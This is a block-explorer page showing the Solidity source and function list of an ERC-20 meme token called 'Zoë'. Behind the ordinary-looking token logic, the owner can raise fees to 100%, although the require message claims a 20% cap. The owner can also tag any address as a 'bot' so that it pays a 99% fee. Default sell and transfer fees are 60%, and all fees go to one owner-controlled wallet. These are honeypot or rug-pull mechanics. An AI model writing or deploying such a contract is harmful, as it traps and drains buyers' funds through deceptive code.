    function factory() external pure returns (address);
    function WETH() external pure returns (address);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline) external;
}

contract ZOE is IERC20, Ownable {
    using SafeMath for uint256;
    string private constant _name = unicode"Zoë";
    string private constant _symbol = unicode"ZOË";
    uint8 private constant _decimals = 9;
    uint256 private _totalSupply = 420690000000000 * (10 ** _decimals);
    mapping (address => uint256) _balances;
    mapping (address => mapping (address => uint256)) private _allowances;
    mapping (address => bool) public isFeeExempt;
    mapping (address => bool) private isBot;
    IRouter router;
    address public pair;
    bool private tradingAllowed = false;
    bool private swapEnabled = true;
    uint256 private swapTimes;
    bool private swapping;
    uint256 swapAmount = 1;
    uint256 private swapThreshold = ( _totalSupply * 1000 ) / 100000;
    uint256 private minTokenAmount = ( _totalSupply * 10 ) / 100000;
    modifier lockTheSwap {swapping = true; _; swapping = false;}
    uint256 private liquidityFee = 0;
    uint256 private marketingFee = 0;
    uint256 private developmentFee = 1000;
    uint256 private burnFee = 0;
    uint256 private totalFee = 3000;
    uint256 private sellFee = 6000;
    uint256 private transferFee = 6000;
    uint256 private denominator = 10000;
    address internal constant DEAD = 0x000000000000000000000000000000000000dEaD;
    address internal development_receiver = 0x9CfC14915CCd6F242289589032e9a0424486D48B; 
    address internal marketing_receiver = 0x9CfC14915CCd6F242289589032e9a0424486D48B;
    address internal liquidity_receiver = 0x9CfC14915CCd6F242289589032e9a0424486D48B;
    uint256 public _maxTxAmount = ( _totalSupply * 200 ) / 10000;
    uint256 public _maxSellAmount = ( _totalSupply * 300 ) / 10000;
    uint256 public _maxWalletToken = ( _totalSupply * 300 ) / 10000;

    constructor() Ownable(msg.sender) {
        IRouter _router = IRouter(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        address _pair = IFactory(_router.factory()).createPair(address(this), _router.WETH());
        router = _router; pair = _pair;
        isFeeExempt[address(this)] = true;
        isFeeExempt[liquidity_receiver] = true;
        isFeeExempt[marketing_receiver] = true;
        isFeeExempt[development_receiver] = true;
        isFeeExempt[msg.sender] = true;
        _balances[msg.sender] = _totalSupply;
        emit Transfer(address(0), msg.sender, _totalSupply);
    }

    receive() external payable {}
    function name() public pure returns (string memory) {return _name;}
    function symbol() public pure returns (string memory) {return _symbol;}
    function decimals() public pure returns (uint8) {return _decimals;}
    function OpenTrading() external onlyOwner {tradingAllowed = true;}
    function getOwner() external view override returns (address) { return owner; }
    function balanceOf(address account) public view override returns (uint256) {return _balances[account];}
    function transfer(address recipient, uint256 amount) public override returns (bool) {_transfer(msg.sender, recipient, amount);return true;}
    function allowance(address owner, address spender) public view override returns (uint256) {return _allowances[owner][spender];}
    function setisExempt(address _address, bool _enabled) external onlyOwner {isFeeExempt[_address] = _enabled;}
    function approve(address spender, uint256 amount) public override returns (bool) {_approve(msg.sender, spender, amount);return true;}
    function totalSupply() public view override returns (uint256) {return _totalSupply.sub(balanceOf(DEAD)).sub(balanceOf(address(0)));}

    function shouldContractSwap(address sender, address recipient, uint256 amount) internal view returns (bool) {
        bool aboveMin = amount >= minTokenAmount;
        bool aboveThreshold = balanceOf(address(this)) >= swapThreshold;
        return !swapping && swapEnabled && tradingAllowed && aboveMin && !isFeeExempt[sender] && recipient == pair && swapTimes >= swapAmount && aboveThreshold;
    }

    function setContractSwap(uint256 _swapAmount, uint256 _swapThreshold, uint256 _minTokenAmount) external onlyOwner {
        swapAmount = _swapAmount; swapThreshold = _totalSupply.mul(_swapThreshold).div(uint256(100000)); 
        minTokenAmount = _totalSupply.mul(_minTokenAmount).div(uint256(100000));
    }

    function setTransactionRequire(uint256 _liquidity, uint256 _marketing, uint256 _burn, uint256 _development, uint256 _total, uint256 _sell, uint256 _trans) external onlyOwner {
        liquidityFee = _liquidity; marketingFee = _marketing; burnFee = _burn; developmentFee = _development; totalFee = _total; sellFee = _sell; transferFee = _trans;
        require(totalFee <= denominator.div(1) && sellFee <= denominator.div(1) && transferFee <= denominator.div(1), "totalFee and sellFee cannot be more than 20%");
    }

    function setTransactionLimit(uint256 _buy, uint256 _sell, uint256 _wallet) external onlyOwner {
        uint256 newTx = _totalSupply.mul(_buy).div(10000); uint256 newTransfer = _totalSupply.mul(_sell).div(10000); uint256 newWallet = _totalSupply.mul(_wallet).div(10000);
        _maxTxAmount = newTx; _maxSellAmount = newTransfer; _maxWalletToken = newWallet;
        uint256 limit = totalSupply().mul(5).div(1000);
        require(newTx >= limit && newTransfer >= limit && newWallet >= limit, "Max TXs and Max Wallet cannot be less than .5%");
    }

    function setInternalAddresses(address _marketing, address _liquidity, address _development) external onlyOwner {
        marketing_receiver = _marketing; liquidity_receiver = _liquidity; development_receiver = _development;
        isFeeExempt[_marketing] = true; isFeeExempt[_liquidity] = true; isFeeExempt[_development] = true;
    }

    function setBot(address[] calldata addresses, bool _enabled) external onlyOwner {
        for(uint i=0; i < addresses.length; i++){
        isBot[addresses[i]] = _enabled; }
    }

    function manualSwap() external onlyOwner {
        swapAndLiquify(swapThreshold);
    }

    function rescueERC20(address _address, uint256 percent) external onlyOwner {
        uint256 _amount = IERC20(_address).balanceOf(address(this)).mul(percent).div(100);
        IERC20(_address).transfer(development_receiver, _amount);
    }

    function swapAndLiquify(uint256 tokens) private lockTheSwap {
        uint256 _denominator = (liquidityFee.add(1).add(marketingFee).add(developmentFee)).mul(2);
        uint256 tokensToAddLiquidityWith = tokens.mul(liquidityFee).div(_denominator);
        uint256 toSwap = tokens.sub(tokensToAddLiquidityWith);
        uint256 initialBalance = address(this).balance;
        swapTokensForETH(toSwap);
        uint256 deltaBalance = address(this).balance.sub(initialBalance);
        uint256 unitBalance= deltaBalance.div(_denominator.sub(liquidityFee));
        uint256 ETHToAddLiquidityWith = unitBalance.mul(liquidityFee);
        if(ETHToAddLiquidityWith > uint256(0)){addLiquidity(tokensToAddLiquidityWith, ETHToAddLiquidityWith); }
        uint256 marketingAmt = unitBalance.mul(2).mul(marketingFee);
        if(marketingAmt > 0){payable(marketing_receiver).transfer(marketingAmt);}
        uint256 contractBalance = address(this).balance;
        if(contractBalance > uint256(0)){payable(development_receiver).transfer(contractBalance);}
    }

    function addLiquidity(uint256 tokenAmount, uint256 ETHAmount) private {
        _approve(address(this), address(router), tokenAmount);
        router.addLiquidityETH{value: ETHAmount}(
            address(this),
            tokenAmount,
            0,
            0,
            liquidity_receiver,
            block.timestamp);
    }

    function swapTokensForETH(uint256 tokenAmount) private {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = router.WETH();
        _approve(address(this), address(router), tokenAmount);
        router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp);
    }

    function shouldTakeFee(address sender, address recipient) internal view returns (bool) {
        return !isFeeExempt[sender] && !isFeeExempt[recipient];
    }

    function getTotalFee(address sender, address recipient) internal view returns (uint256) {
        if(isBot[sender] || isBot[recipient]){return denominator.sub(uint256(100));}
        if(recipient == pair){return sellFee;}
        if(sender == pair){return totalFee;}
        return transferFee;
    }

    function takeFee(address sender, address recipient, uint256 amount) internal returns (uint256) {
        if(getTotalFee(sender, recipient) > 0){
        uint256 feeAmount = amount.div(denominator).mul(getTotalFee(sender, recipient));
        _balances[address(this)] = _balances[address(this)].add(feeAmount);
        emit Transfer(sender, address(this), feeAmount);
        if(burnFee > uint256(0) && getTotalFee(sender, recipient) > burnFee){_transfer(address(this), address(DEAD), amount.div(denominator).mul(burnFee));}
        return amount.sub(feeAmount);} return amount;
    }

    function _transfer(address sender, address recipient, uint256 amount) private {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        require(amount <= balanceOf(sender),"You are trying to transfer more than your balance");
        if(!isFeeExempt[sender] && !isFeeExempt[recipient]){require(tradingAllowed, "tradingAllowed");}
        if(!isFeeExempt[sender] && !isFeeExempt[recipient] && recipient != address(pair) && recipient != address(DEAD)){
        require((_balances[recipient].add(amount)) <= _maxWalletToken, "Exceeds maximum wallet amount.");}
        if(sender != pair){require(amount <= _maxSellAmount || isFeeExempt[sender] || isFeeExempt[recipient], "TX Limit Exceeded");}
        require(amount <= _maxTxAmount || isFeeExempt[sender] || isFeeExempt[recipient], "TX Limit Exceeded"); 
        if(recipient == pair && !isFeeExempt[sender]){swapTimes += uint256(1);}
        if(shouldContractSwap(sender, recipient, amount)){swapAndLiquify(swapThreshold); swapTimes = uint256(0);}
        _balances[sender] = _balances[sender].sub(amount);
        uint256 amountReceived = shouldTakeFee(sender, recipient) ? takeFee(sender, recipient, amount) : amount;
        _balances[recipient] = _balances[recipient].add(amountReceived);
        emit Transfer(sender, recipient, amountReceived);
    }

    function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, msg.sender, _allowances[sender][msg.sender].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    function _approve(address owner, address spender, uint256 amount) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

}

Read Contract

_maxSellAmount 0x7cca52fe → uint256
_maxTxAmount 0x7d1db4a5 → uint256
_maxWalletToken 0x78109e54 → uint256
allowance 0xdd62ed3e → uint256
balanceOf 0x70a08231 → uint256
decimals 0x313ce567 → uint8
getOwner 0x893d20e8 → address
isFeeExempt 0x3f4218e0 → bool
isOwner 0x2f54bf6e → bool
name 0x06fdde03 → string
pair 0xa8aa1b31 → address
symbol 0x95d89b41 → string
totalSupply 0x18160ddd → uint256

Write Contract 13 functions

These functions modify contract state and require a wallet transaction to execute.

OpenTrading 0x51cd7cc3
No parameters
approve 0x095ea7b3
address spender
uint256 amount
returns: bool
manualSwap 0x51bc3c85
No parameters
renounceOwnership 0x715018a6
No parameters
rescueERC20 0x8cd4426d
address _address
uint256 percent
setBot 0x39efcf9e
address[] addresses
bool _enabled
setContractSwap 0x1b5faebb
uint256 _swapAmount
uint256 _swapThreshold
uint256 _minTokenAmount
setInternalAddresses 0x9213c358
address _marketing
address _liquidity
address _development
setTransactionLimit 0xdfa3a2e3
uint256 _buy
uint256 _sell
uint256 _wallet
setTransactionRequire 0x2331777d
uint256 _liquidity
uint256 _marketing
uint256 _burn
uint256 _development
uint256 _total
uint256 _sell
uint256 _trans
setisExempt 0x48ff2b8b
address _address
bool _enabled
transfer 0xa9059cbb
address recipient
uint256 amount
returns: bool
transferFrom 0x23b872dd
address sender
address recipient
uint256 amount
returns: bool

Recent Transactions

No transactions found for this address